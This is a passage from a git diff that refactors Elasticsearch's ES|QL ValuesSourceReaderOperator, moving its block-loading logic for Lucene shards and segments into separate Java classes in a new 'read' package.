(Block b : blocks) { - valuesLoaded += b.getTotalValueCount(); - } - return page.appendBlocks(blocks); - } catch (IOException e) { - throw new UncheckedIOException(e); - } finally { - if (success == false) { - Releasables.closeExpectNoException(blocks); - } - } - } - - private void positionFieldWork(int shard, int segment, int firstDoc) { - if (lastShard == shard) { - if (lastSegment == segment) { - for (FieldWork w : fields) { - w.sameSegment(firstDoc); - } - return; - } - lastSegment = segment; - for (FieldWork w : fields) { - w.sameShardNewSegment(); - } - return; - } - lastShard = shard; - lastSegment = segment; - for (FieldWork w : 
fields) { - w.newShard(shard); - } - } - - private boolean positionFieldWorkDocGuarteedAscending(int shard, int segment) { - if (lastShard == shard) { - if (lastSegment == segment) { - return false; - } - lastSegment = segment; - for (FieldWork w : fields) { - w.sameShardNewSegment(); - } - return true; - } - lastShard = shard; - lastSegment = segment; - for (FieldWork w : fields) { - w.newShard(shard); - } - return true; - } - - private void loadFromSingleLeaf(Block[] blocks, int shard, int segment, BlockLoader.Docs docs) throws IOException { - int firstDoc = docs.get(0); - positionFieldWork(shard, segment, firstDoc); - StoredFieldsSpec storedFieldsSpec = StoredFieldsSpec.NO_REQUIREMENTS; - List rowStrideReaders = new ArrayList<>(fields.length); - LeafReaderContext ctx = ctx(shard, segment); - try (ComputeBlockLoaderFactory loaderBlockFactory = new ComputeBlockLoaderFactory(blockFactory, docs.count())) { - for (int f = 0; f < fields.length; f++) { - FieldWork field = fields[f]; - BlockLoader.ColumnAtATimeReader columnAtATime = field.columnAtATime(ctx); - if (columnAtATime != null) { - blocks[f] = (Block) columnAtATime.read(loaderBlockFactory, docs); - sanityCheckBlock(columnAtATime, docs.count(), blocks[f], f); - } else { - rowStrideReaders.add( - new RowStrideReaderWork( - field.rowStride(ctx), - (Block.Builder) field.loader.builder(loaderBlockFactory, docs.count()), - field.loader, - f - ) - ); - storedFieldsSpec = storedFieldsSpec.merge(field.loader.rowStrideStoredFieldSpec()); - } - } - - SourceLoader sourceLoader = null; - ShardContext shardContext = shardContexts.get(shard); - if (storedFieldsSpec.requiresSource()) { - sourceLoader = shardContext.newSourceLoader.get(); - storedFieldsSpec = storedFieldsSpec.merge(new StoredFieldsSpec(true, false, sourceLoader.requiredStoredFields())); - } - - if (rowStrideReaders.isEmpty()) { - return; - } - if (storedFieldsSpec.equals(StoredFieldsSpec.NO_REQUIREMENTS)) { - throw new IllegalStateException( - "found row stride readers [" + rowStrideReaders + "] without stored fields [" + storedFieldsSpec + "]" - ); - } - StoredFieldLoader storedFieldLoader; - if (useSequentialStoredFieldsReader(docs, shardContext.storedFieldsSequentialProportion())) { - storedFieldLoader = StoredFieldLoader.fromSpecSequential(storedFieldsSpec); - trackStoredFields(storedFieldsSpec, true); - } else { - storedFieldLoader = StoredFieldLoader.fromSpec(storedFieldsSpec); - trackStoredFields(storedFieldsSpec, false); - } - BlockLoaderStoredFieldsFromLeafLoader storedFields = new BlockLoaderStoredFieldsFromLeafLoader( - storedFieldLoader.getLoader(ctx, null), - sourceLoader != null ? 
sourceLoader.leaf(ctx.reader(), null) : null - ); - for (int p = 0; p < docs.count(); p++) { - int doc = docs.get(p); - storedFields.advanceTo(doc); - for (RowStrideReaderWork work : rowStrideReaders) { - work.read(doc, storedFields); - } - } - for (RowStrideReaderWork work : rowStrideReaders) { - blocks[work.offset] = work.build(); - sanityCheckBlock(work.reader, docs.count(), blocks[work.offset], work.offset); - } - } finally { - Releasables.close(rowStrideReaders); - } - } - - private void loadFromSingleLeafUnsorted(Block[] blocks, DocVector docVector) throws IOException { - IntVector docs = docVector.docs(); - int[] forwards = docVector.shardSegmentDocMapForwards(); - int shard = docVector.shards().getInt(0); - int segment = docVector.segments().getInt(0); - loadFromSingleLeaf(blocks, shard, segment, new BlockLoader.Docs() { - @Override - public int count() { - return docs.getPositionCount(); - } - - @Override - public int get(int i) { - return docs.getInt(forwards[i]); - } - }); - final int[] backwards = docVector.shardSegmentDocMapBackwards(); - for (int i = 0; i < blocks.length; i++) { - Block in = blocks[i]; - blocks[i] = in.filter(backwards); - in.close(); - } - } - - private class LoadFromMany implements Releasable { - private final Block[] target; - private final IntVector shards; - private final IntVector segments; - private final IntVector docs; - private final int[] forwards; - private final int[] backwards; - private final Block.Builder[][] builders; - private final BlockLoader[][] converters; - private final Block.Builder[] fieldTypeBuilders; - private final BlockLoader.RowStrideReader[] rowStride; - - BlockLoaderStoredFieldsFromLeafLoader storedFields; - - LoadFromMany(Block[] target, DocVector docVector) { - this.target = target; - shards = docVector.shards(); - segments = docVector.segments(); - docs = docVector.docs(); - forwards = docVector.shardSegmentDocMapForwards(); - backwards = docVector.shardSegmentDocMapBackwards(); - fieldTypeBuilders = new Block.Builder[target.length]; - builders = new Block.Builder[target.length][shardContexts.size()]; - converters = new BlockLoader[target.length][shardContexts.size()]; - rowStride = new BlockLoader.RowStrideReader[target.length]; - } - - void run() throws IOException { - for (int f = 0; f < fields.length; f++) { - /* - * Important note: each field has a desired type, which might not match the mapped type (in the case of union-types). - * We create the final block builders using the desired type, one for each field, but then also use inner builders - * (one for each field and shard), and converters (again one for each field and shard) to actually perform the field - * loading in a way that is correct for the mapped field type, and then convert between that type and the desired type. 
- */ - fieldTypeBuilders[f] = fields[f].info.type.newBlockBuilder(docs.getPositionCount(), blockFactory); - builders[f] = new Block.Builder[shardContexts.size()]; - converters[f] = new BlockLoader[shardContexts.size()]; - } - try (ComputeBlockLoaderFactory loaderBlockFactory = new ComputeBlockLoaderFactory(blockFactory, docs.getPositionCount())) { - int p = forwards[0]; - int shard = shards.getInt(p); - int segment = segments.getInt(p); - int firstDoc = docs.getInt(p); - positionFieldWork(shard, segment, firstDoc); - LeafReaderContext ctx = ctx(shard, segment); - fieldsMoved(ctx, shard); - verifyBuilders(loaderBlockFactory, shard); - read(firstDoc, shard); - for (int i = 1; i < forwards.length; i++) { - p = forwards[i]; - shard = shards.getInt(p); - segment = segments.getInt(p); - boolean changedSegment = positionFieldWorkDocGuarteedAscending(shard, segment); - if (changedSegment) { - ctx = ctx(shard, segment); - fieldsMoved(ctx, shard); - } - verifyBuilders(loaderBlockFactory, shard); - read(docs.getInt(p), shard); - } - } - for (int f = 0; f < target.length; f++) { - for (int s = 0; s < shardContexts.size(); s++) { - if (builders[f][s] != null) { - try (Block orig = (Block) converters[f][s].convert(builders[f][s].build())) { - fieldTypeBuilders[f].copyFrom(orig, 0, orig.getPositionCount()); - } - } - } - try (Block targetBlock = fieldTypeBuilders[f].build()) { - target[f] = targetBlock.filter(backwards); - } - sanityCheckBlock(rowStride[f], docs.getPositionCount(), target[f], f); - } - } - - private void fieldsMoved(LeafReaderContext ctx, int shard) throws IOException { - StoredFieldsSpec storedFieldsSpec = StoredFieldsSpec.NO_REQUIREMENTS; - for (int f = 0; f < fields.length; f++) { - FieldWork field = fields[f]; - rowStride[f] = field.rowStride(ctx); - storedFieldsSpec = storedFieldsSpec.merge(field.loader.rowStrideStoredFieldSpec()); - } - SourceLoader sourceLoader = null; - if (storedFieldsSpec.requiresSource()) { - sourceLoader = shardContexts.get(shard).newSourceLoader.get(); - storedFieldsSpec = storedFieldsSpec.merge(new StoredFieldsSpec(true, false, sourceLoader.requiredStoredFields())); - } - storedFields = new BlockLoaderStoredFieldsFromLeafLoader( - StoredFieldLoader.fromSpec(storedFieldsSpec).getLoader(ctx, null), - sourceLoader != null ? sourceLoader.leaf(ctx.reader(), null) : null - ); - if (false == storedFieldsSpec.equals(StoredFieldsSpec.NO_REQUIREMENTS)) { - trackStoredFields(storedFieldsSpec, false); - } - } - - private void verifyBuilders(ComputeBlockLoaderFactory loaderBlockFactory, int shard) { - for (int f = 0; f < fields.length; f++) { - if (builders[f][shard] == null) { - // Note that this relies on field.newShard() to set the loader and converter correctly for the current shard - builders[f][shard] = (Block.Builder) fields[f].loader.builder(loaderBlockFactory, docs.getPositionCount()); - converters[f][shard] = fields[f].loader; - } - } - } - - private void read(int doc, int shard) throws IOException { - storedFields.advanceTo(doc); - for (int f = 0; f < builders.length; f++) { - rowStride[f].read(doc, storedFields, builders[f][shard]); - } - } - - @Override - public void close() { - Releasables.closeExpectNoException(fieldTypeBuilders); - for (int f = 0; f < fields.length; f++) { - Releasables.closeExpectNoException(builders[f]); - } - } - } - - /** - * Is it more efficient to use a sequential stored field reader - * when reading stored fields for the documents contained in {@code docIds}? 
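A minimal sketch of the two-level builder scheme described in the union-types comment above, reduced to plain Java with hypothetical converters: shard 0 maps the field as a long, shard 1 as a string, and both are converted to the single desired type before landing in one final builder:

    import java.util.List;
    import java.util.function.Function;

    class UnionTypeSketch {
        public static void main(String[] args) {
            // One converter per shard: mapped type -> desired type (String here).
            List<Function<Object, String>> converters = List.of(
                v -> Long.toString((Long) v), // shard 0 stored longs
                v -> (String) v               // shard 1 already stored strings
            );
            StringBuilder desiredTypeBuilder = new StringBuilder(); // stands in for fieldTypeBuilders[f]
            record Row(int shard, Object value) {}
            for (Row row : List.of(new Row(0, 42L), new Row(1, "43"), new Row(0, 44L))) {
                desiredTypeBuilder.append(converters.get(row.shard()).apply(row.value())).append(' ');
            }
            System.out.println(desiredTypeBuilder); // 42 43 44
        }
    }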
- */ - private boolean useSequentialStoredFieldsReader(BlockLoader.Docs docs, double storedFieldsSequentialProportion) { - int count = docs.count(); - if (count < SEQUENTIAL_BOUNDARY) { - return false; - } - int range = docs.get(count - 1) - docs.get(0); - return range * storedFieldsSequentialProportion <= count; - } - - private void trackStoredFields(StoredFieldsSpec spec, boolean sequential) { - readersBuilt.merge( - "stored_fields[" - + "requires_source:" - + spec.requiresSource() - + ", fields:" - + spec.requiredStoredFields().size() - + ", sequential: " - + sequential - + "]", - 1, - (prev, one) -> prev + one - ); - } - - private class FieldWork { - final FieldInfo info; - - BlockLoader loader; - BlockLoader.ColumnAtATimeReader columnAtATime; - BlockLoader.RowStrideReader rowStride; - - FieldWork(FieldInfo info) { - this.info = info; - } - - void sameSegment(int firstDoc) { - if (columnAtATime != null && columnAtATime.canReuse(firstDoc) == false) { - columnAtATime = null; - } - if (rowStride != null && rowStride.canReuse(firstDoc) == false) { - rowStride = null; - } - } - - void sameShardNewSegment() { - columnAtATime = null; - rowStride = null; - } - - void newShard(int shard) { - loader = info.blockLoader.apply(shard); - columnAtATime = null; - rowStride = null; - } - - BlockLoader.ColumnAtATimeReader columnAtATime(LeafReaderContext ctx) throws IOException { - if (columnAtATime == null) { - columnAtATime = loader.columnAtATimeReader(ctx); - trackReader("column_at_a_time", this.columnAtATime); - } - return columnAtATime; - } - - BlockLoader.RowStrideReader rowStride(LeafReaderContext ctx) throws IOException { - if (rowStride == null) { - rowStride = loader.rowStrideReader(ctx); - trackReader("row_stride", this.rowStride); - } - return rowStride; - } - - private void trackReader(String type, BlockLoader.Reader reader) { - readersBuilt.merge(info.name + ":" + type + ":" + reader, 1, (prev, one) -> prev + one); - } - } - - private record RowStrideReaderWork(BlockLoader.RowStrideReader reader, Block.Builder builder, BlockLoader loader, int offset) - implements - Releasable { - void read(int doc, BlockLoaderStoredFieldsFromLeafLoader storedFields) throws IOException { - reader.read(doc, storedFields, builder); - } - - Block build() { - return (Block) loader.convert(builder.build()); - } - - @Override - public void close() { - builder.close(); - } - } - - private LeafReaderContext ctx(int shard, int segment) { - return shardContexts.get(shard).reader().leaves().get(segment); - } - - @Override - public String toString() { - StringBuilder sb = new StringBuilder(); - sb.append("ValuesSourceReaderOperator[fields = ["); - if (fields.length < 10) { - boolean first = true; - for (FieldWork f : fields) { - if (first) { - first = false; - } else { - sb.append(", "); - } - sb.append(f.info.name); - } - } else { - sb.append(fields.length).append(" fields"); - } - return sb.append("]]").toString(); - } - - @Override - protected Status status(long processNanos, int pagesProcessed, long rowsReceived, long rowsEmitted) { - return new Status(new TreeMap<>(readersBuilt), processNanos, pagesProcessed, rowsReceived, rowsEmitted, valuesLoaded); - } - - /** - * Quick checks for on the loaded block to make sure it looks reasonable. 
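The deleted useSequentialStoredFieldsReader encodes a density heuristic worth a worked example; in the self-contained restatement below, 0.2 is only an illustrative proportion, not necessarily the shipped default:

    class SequentialReaderHeuristic {
        static final int SEQUENTIAL_BOUNDARY = 10;

        // Sequential stored-field readers decompress whole blocks of docs, so they
        // only pay off for enough docs (count >= SEQUENTIAL_BOUNDARY) that are dense
        // enough within their doc-id range (range * proportion <= count).
        static boolean useSequential(int count, int firstDoc, int lastDoc, double proportion) {
            if (count < SEQUENTIAL_BOUNDARY) {
                return false;
            }
            int range = lastDoc - firstDoc;
            return range * proportion <= count;
        }

        public static void main(String[] args) {
            // 100 docs inside a 300-id range: 300 * 0.2 = 60 <= 100, so read sequentially.
            System.out.println(useSequential(100, 1_000, 1_300, 0.2)); // true
            // The same 100 docs spread over 900 ids: 900 * 0.2 = 180 > 100, so random access.
            System.out.println(useSequential(100, 1_000, 1_900, 0.2)); // false
        }
    }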
- * @param loader the object that did the loading - we use it to make error messages if the block is busted - * @param expectedPositions how many positions the block should have - it's as many as the incoming {@link Page} has - * @param block the block to sanity check - * @param field offset into the {@link #fields} array for the block being loaded - */ - private void sanityCheckBlock(Object loader, int expectedPositions, Block block, int field) { - if (block.getPositionCount() != expectedPositions) { - throw new IllegalStateException( - sanityCheckBlockErrorPrefix(loader, block, field) - + " has [" - + block.getPositionCount() - + "] positions instead of [" - + expectedPositions - + "]" - ); - } - if (block.elementType() != ElementType.NULL && block.elementType() != fields[field].info.type) { - throw new IllegalStateException( - sanityCheckBlockErrorPrefix(loader, block, field) - + "'s element_type [" - + block.elementType() - + "] NOT IN (NULL, " - + fields[field].info.type - + ")" - ); - } - } - - private String sanityCheckBlockErrorPrefix(Object loader, Block block, int field) { - return fields[field].info.name + "[" + loader + "]: " + block; - } - - public static class Status extends AbstractPageMappingOperator.Status { - public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( - Operator.Status.class, - "values_source_reader", - Status::new - ); - - private final Map readersBuilt; - private final long valuesLoaded; - - Status( - Map readersBuilt, - long processNanos, - int pagesProcessed, - long rowsReceived, - long rowsEmitted, - long valuesLoaded - ) { - super(processNanos, pagesProcessed, rowsReceived, rowsEmitted); - this.readersBuilt = readersBuilt; - this.valuesLoaded = valuesLoaded; - } - - Status(StreamInput in) throws IOException { - super(in); - readersBuilt = in.readOrderedMap(StreamInput::readString, StreamInput::readVInt); - valuesLoaded = supportsValuesLoaded(in.getTransportVersion()) ? 
in.readVLong() : 0; - } - - @Override - public void writeTo(StreamOutput out) throws IOException { - super.writeTo(out); - out.writeMap(readersBuilt, StreamOutput::writeVInt); - if (supportsValuesLoaded(out.getTransportVersion())) { - out.writeVLong(valuesLoaded); - } - } - - private static boolean supportsValuesLoaded(TransportVersion version) { - return version.onOrAfter(ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED) - || version.isPatchFrom(ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED_8_19); - } - - @Override - public String getWriteableName() { - return ENTRY.name; - } - - public Map readersBuilt() { - return readersBuilt; - } - - @Override - public long valuesLoaded() { - return valuesLoaded; - } - - @Override - public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { - builder.startObject(); - builder.startObject("readers_built"); - for (Map.Entry e : readersBuilt.entrySet()) { - builder.field(e.getKey(), e.getValue()); - } - builder.endObject(); - builder.field("values_loaded", valuesLoaded); - innerToXContent(builder); - return builder.endObject(); - } - - @Override - public boolean equals(Object o) { - if (super.equals(o) == false) return false; - Status status = (Status) o; - return readersBuilt.equals(status.readersBuilt) && valuesLoaded == status.valuesLoaded; - } - - @Override - public int hashCode() { - return Objects.hash(super.hashCode(), readersBuilt, valuesLoaded); - } - - @Override - public String toString() { - return Strings.toString(this); - } - } - - private static class ComputeBlockLoaderFactory extends DelegatingBlockLoaderFactory implements Releasable { - private final int pageSize; - private Block nullBlock; - - private ComputeBlockLoaderFactory(BlockFactory factory, int pageSize) { - super(factory); - this.pageSize = pageSize; - } - - @Override - public Block constantNulls() { - if (nullBlock == null) { - nullBlock = factory.newConstantNullBlock(pageSize); - } - nullBlock.incRef(); - return nullBlock; - } - - @Override - public void close() { - if (nullBlock != null) { - nullBlock.close(); - } - } - - @Override - public BytesRefBlock constantBytes(BytesRef value) { - return factory.newConstantBytesRefBlockWith(value, pageSize); - } - } - - public abstract static class DelegatingBlockLoaderFactory implements BlockLoader.BlockFactory { - protected final BlockFactory factory; - - protected DelegatingBlockLoaderFactory(BlockFactory factory) { - this.factory = factory; - } - - @Override - public BlockLoader.BooleanBuilder booleansFromDocValues(int expectedCount) { - return factory.newBooleanBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); - } - - @Override - public BlockLoader.BooleanBuilder booleans(int expectedCount) { - return factory.newBooleanBlockBuilder(expectedCount); - } - - @Override - public BlockLoader.BytesRefBuilder bytesRefsFromDocValues(int expectedCount) { - return factory.newBytesRefBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.DEDUPLICATED_AND_SORTED_ASCENDING); - } - - @Override - public BlockLoader.BytesRefBuilder bytesRefs(int expectedCount) { - return factory.newBytesRefBlockBuilder(expectedCount); - } - - @Override - public BlockLoader.DoubleBuilder doublesFromDocValues(int expectedCount) { - return factory.newDoubleBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); - } - - @Override - public BlockLoader.DoubleBuilder doubles(int expectedCount) { - return factory.newDoubleBlockBuilder(expectedCount); - } - - @Override - public BlockLoader.FloatBuilder 
denseVectors(int expectedVectorsCount, int dimensions) { - return factory.newFloatBlockBuilder(expectedVectorsCount * dimensions); - } - - @Override - public BlockLoader.IntBuilder intsFromDocValues(int expectedCount) { - return factory.newIntBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); - } - - @Override - public BlockLoader.IntBuilder ints(int expectedCount) { - return factory.newIntBlockBuilder(expectedCount); - } - - @Override - public BlockLoader.LongBuilder longsFromDocValues(int expectedCount) { - return factory.newLongBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); - } - - @Override - public BlockLoader.LongBuilder longs(int expectedCount) { - return factory.newLongBlockBuilder(expectedCount); - } - - @Override - public BlockLoader.Builder nulls(int expectedCount) { - return ElementType.NULL.newBlockBuilder(expectedCount, factory); - } - - @Override - public BlockLoader.SingletonOrdinalsBuilder singletonOrdinalsBuilder(SortedDocValues ordinals, int count) { - return new SingletonOrdinalsBuilder(factory, ordinals, count); - } - - @Override - public BlockLoader.AggregateMetricDoubleBuilder aggregateMetricDoubleBuilder(int count) { - return factory.newAggregateMetricDoubleBlockBuilder(count); - } - } -} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ComputeBlockLoaderFactory.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ComputeBlockLoaderFactory.java new file mode 100644 index 0000000000000..20e7ffc4ca2cb --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ComputeBlockLoaderFactory.java @@ -0,0 +1,43 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.apache.lucene.util.BytesRef; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BlockFactory; +import org.elasticsearch.compute.data.BytesRefBlock; +import org.elasticsearch.core.Releasable; + +class ComputeBlockLoaderFactory extends DelegatingBlockLoaderFactory implements Releasable { + private Block nullBlock; + + ComputeBlockLoaderFactory(BlockFactory factory) { + super(factory); + } + + @Override + public Block constantNulls(int count) { + if (nullBlock == null) { + nullBlock = factory.newConstantNullBlock(count); + } + nullBlock.incRef(); + return nullBlock; + } + + @Override + public void close() { + if (nullBlock != null) { + nullBlock.close(); + } + } + + @Override + public BytesRefBlock constantBytes(BytesRef value, int count) { + return factory.newConstantBytesRefBlockWith(value, count); + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/DelegatingBlockLoaderFactory.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/DelegatingBlockLoaderFactory.java new file mode 100644 index 0000000000000..8dc5b6cc43ecf --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/DelegatingBlockLoaderFactory.java @@ -0,0 +1,93 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. 
Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.apache.lucene.index.SortedDocValues; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BlockFactory; +import org.elasticsearch.compute.data.ElementType; +import org.elasticsearch.compute.data.SingletonOrdinalsBuilder; +import org.elasticsearch.index.mapper.BlockLoader; + +public abstract class DelegatingBlockLoaderFactory implements BlockLoader.BlockFactory { + protected final BlockFactory factory; + + protected DelegatingBlockLoaderFactory(BlockFactory factory) { + this.factory = factory; + } + + @Override + public BlockLoader.BooleanBuilder booleansFromDocValues(int expectedCount) { + return factory.newBooleanBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); + } + + @Override + public BlockLoader.BooleanBuilder booleans(int expectedCount) { + return factory.newBooleanBlockBuilder(expectedCount); + } + + @Override + public BlockLoader.BytesRefBuilder bytesRefsFromDocValues(int expectedCount) { + return factory.newBytesRefBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.DEDUPLICATED_AND_SORTED_ASCENDING); + } + + @Override + public BlockLoader.BytesRefBuilder bytesRefs(int expectedCount) { + return factory.newBytesRefBlockBuilder(expectedCount); + } + + @Override + public BlockLoader.DoubleBuilder doublesFromDocValues(int expectedCount) { + return factory.newDoubleBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); + } + + @Override + public BlockLoader.DoubleBuilder doubles(int expectedCount) { + return factory.newDoubleBlockBuilder(expectedCount); + } + + @Override + public BlockLoader.FloatBuilder denseVectors(int expectedVectorsCount, int dimensions) { + return factory.newFloatBlockBuilder(expectedVectorsCount * dimensions); + } + + @Override + public BlockLoader.IntBuilder intsFromDocValues(int expectedCount) { + return factory.newIntBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); + } + + @Override + public BlockLoader.IntBuilder ints(int expectedCount) { + return factory.newIntBlockBuilder(expectedCount); + } + + @Override + public BlockLoader.LongBuilder longsFromDocValues(int expectedCount) { + return factory.newLongBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); + } + + @Override + public BlockLoader.LongBuilder longs(int expectedCount) { + return factory.newLongBlockBuilder(expectedCount); + } + + @Override + public BlockLoader.Builder nulls(int expectedCount) { + return ElementType.NULL.newBlockBuilder(expectedCount, factory); + } + + @Override + public BlockLoader.SingletonOrdinalsBuilder singletonOrdinalsBuilder(SortedDocValues ordinals, int count) { + return new SingletonOrdinalsBuilder(factory, ordinals, count); + } + + @Override + public BlockLoader.AggregateMetricDoubleBuilder aggregateMetricDoubleBuilder(int count) { + return factory.newAggregateMetricDoubleBlockBuilder(count); + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesExtractFieldOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/TimeSeriesExtractFieldOperator.java similarity index 97% rename from x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesExtractFieldOperator.java rename to 
x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/TimeSeriesExtractFieldOperator.java index f535bc462fdfc..b5820929ba290 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesExtractFieldOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/TimeSeriesExtractFieldOperator.java @@ -5,7 +5,7 @@ * 2.0. */ -package org.elasticsearch.compute.lucene; +package org.elasticsearch.compute.lucene.read; import org.apache.lucene.index.IndexReader; import org.apache.lucene.index.LeafReaderContext; @@ -21,6 +21,7 @@ import org.elasticsearch.compute.data.OrdinalBytesRefBlock; import org.elasticsearch.compute.data.OrdinalBytesRefVector; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.ShardContext; import org.elasticsearch.compute.operator.AbstractPageMappingOperator; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; @@ -191,18 +192,18 @@ public void close() { Releasables.close(fieldsReader, super::close); } - static class BlockLoaderFactory extends ValuesSourceReaderOperator.DelegatingBlockLoaderFactory { + static class BlockLoaderFactory extends DelegatingBlockLoaderFactory { BlockLoaderFactory(BlockFactory factory) { super(factory); } @Override - public BlockLoader.Block constantNulls() { + public BlockLoader.Block constantNulls(int count) { throw new UnsupportedOperationException("must not be used by column readers"); } @Override - public BlockLoader.Block constantBytes(BytesRef value) { + public BlockLoader.Block constantBytes(BytesRef value, int count) { throw new UnsupportedOperationException("must not be used by column readers"); } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesFromManyReader.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesFromManyReader.java new file mode 100644 index 0000000000000..6f00e97a1f9f2 --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesFromManyReader.java @@ -0,0 +1,195 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.apache.lucene.index.LeafReaderContext; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DocVector; +import org.elasticsearch.core.Releasable; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.index.fieldvisitor.StoredFieldLoader; +import org.elasticsearch.index.mapper.BlockLoader; +import org.elasticsearch.index.mapper.BlockLoaderStoredFieldsFromLeafLoader; +import org.elasticsearch.index.mapper.SourceLoader; +import org.elasticsearch.logging.LogManager; +import org.elasticsearch.logging.Logger; +import org.elasticsearch.search.fetch.StoredFieldsSpec; + +import java.io.IOException; + +/** + * Loads values from many leaves. Much less efficient than {@link ValuesFromSingleReader}.
+ */ +class ValuesFromManyReader extends ValuesReader { + private static final Logger log = LogManager.getLogger(ValuesFromManyReader.class); + + private final int[] forwards; + private final int[] backwards; + private final BlockLoader.RowStrideReader[] rowStride; + + private BlockLoaderStoredFieldsFromLeafLoader storedFields; + + ValuesFromManyReader(ValuesSourceReaderOperator operator, DocVector docs) { + super(operator, docs); + forwards = docs.shardSegmentDocMapForwards(); + backwards = docs.shardSegmentDocMapBackwards(); + rowStride = new BlockLoader.RowStrideReader[operator.fields.length]; + log.debug("initializing {} positions", docs.getPositionCount()); + } + + @Override + protected void load(Block[] target, int offset) throws IOException { + try (Run run = new Run(target)) { + run.run(offset); + } + } + + class Run implements Releasable { + private final Block[] target; + private final Block.Builder[][] builders; + private final BlockLoader[][] converters; + private final Block.Builder[] fieldTypeBuilders; + + Run(Block[] target) { + this.target = target; + fieldTypeBuilders = new Block.Builder[target.length]; + builders = new Block.Builder[target.length][operator.shardContexts.size()]; + converters = new BlockLoader[target.length][operator.shardContexts.size()]; + } + + void run(int offset) throws IOException { + assert offset == 0; // TODO allow non-0 offset to support splitting pages + for (int f = 0; f < operator.fields.length; f++) { + /* + * Important note: each field has a desired type, which might not match the mapped type (in the case of union-types). + * We create the final block builders using the desired type, one for each field, but then also use inner builders + * (one for each field and shard), and converters (again one for each field and shard) to actually perform the field + * loading in a way that is correct for the mapped field type, and then convert between that type and the desired type. 
+ */ + fieldTypeBuilders[f] = operator.fields[f].info.type().newBlockBuilder(docs.getPositionCount(), operator.blockFactory); + builders[f] = new Block.Builder[operator.shardContexts.size()]; + converters[f] = new BlockLoader[operator.shardContexts.size()]; + } + try (ComputeBlockLoaderFactory loaderBlockFactory = new ComputeBlockLoaderFactory(operator.blockFactory)) { + int p = forwards[offset]; + int shard = docs.shards().getInt(p); + int segment = docs.segments().getInt(p); + int firstDoc = docs.docs().getInt(p); + operator.positionFieldWork(shard, segment, firstDoc); + LeafReaderContext ctx = operator.ctx(shard, segment); + fieldsMoved(ctx, shard); + verifyBuilders(loaderBlockFactory, shard); + read(firstDoc, shard); + + int i = offset + 1; + long estimated = estimatedRamBytesUsed(); + long dangerZoneBytes = Long.MAX_VALUE; // TODO danger_zone if ascending + while (i < forwards.length && estimated < dangerZoneBytes) { + p = forwards[i]; + shard = docs.shards().getInt(p); + segment = docs.segments().getInt(p); + boolean changedSegment = operator.positionFieldWorkDocGuaranteedAscending(shard, segment); + if (changedSegment) { + ctx = operator.ctx(shard, segment); + fieldsMoved(ctx, shard); + } + verifyBuilders(loaderBlockFactory, shard); + read(docs.docs().getInt(p), shard); + i++; + estimated = estimatedRamBytesUsed(); + log.trace("{}: bytes loaded {}/{}", p, estimated, dangerZoneBytes); + } + buildBlocks(); + if (log.isDebugEnabled()) { + long actual = 0; + for (Block b : target) { + actual += b.ramBytesUsed(); + } + log.debug("loaded {} positions total estimated/actual {}/{} bytes", p, estimated, actual); + } + } + } + + private void buildBlocks() { + for (int f = 0; f < target.length; f++) { + for (int s = 0; s < operator.shardContexts.size(); s++) { + if (builders[f][s] != null) { + try (Block orig = (Block) converters[f][s].convert(builders[f][s].build())) { + fieldTypeBuilders[f].copyFrom(orig, 0, 